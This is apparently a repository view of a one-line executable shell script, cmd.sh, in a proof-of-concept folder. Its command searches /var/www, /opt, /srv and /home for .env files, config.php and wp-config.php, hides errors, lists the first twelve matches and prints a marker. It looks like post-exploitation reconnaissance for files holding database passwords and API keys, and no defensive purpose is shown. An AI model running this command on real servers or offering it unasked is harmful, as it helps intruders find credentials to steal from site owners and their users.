poc-u6ea8e/cmd.sh
2026-09-25 01:40:38 +00:00

2 lines
158 B
Bash
Executable File

find /var/www /opt /srv /home -maxdepth 4 -name '.env*' -o -maxdepth 4 -name 'config.php' -o -maxdepth 4 -name 'wp-config.php' 2>/dev/null | head -12; echo E